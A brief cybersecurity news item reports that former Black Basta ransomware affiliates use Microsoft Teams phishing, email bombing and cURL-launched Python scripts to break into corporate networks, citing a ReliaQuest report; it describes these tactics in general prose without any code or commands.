Black Basta Veterans Target Firms via Teams, Python

Former affiliates of the Black Basta ransomware group have resurfaced with renewed cyberattack strategies, leveraging familiar and emerging techniques to breach corporate networks, according to a report by ReliaQuest. The attackers continue to rely on email bombing and phishing lures delivered through Microsoft Teams — methods previously linked to their operations — to gain initial access and maintain persistence within compromised environments.

New to their arsenal is the use of Python scripts executed via cURL commands, which are deployed to retrieve and run malicious payloads from remote servers. This added layer of automation enhances the attackers’ ability to execute code and potentially escalate privileges after initial access.

The tactics indicate a sustained evolution in approach while maintaining core elements of prior campaigns. Though the original Black Basta group’s status remains unclear, the reemergence of its techniques suggests that former operatives remain active in the threat landscape. The report highlights ongoing risks posed by persistent ransomware actors.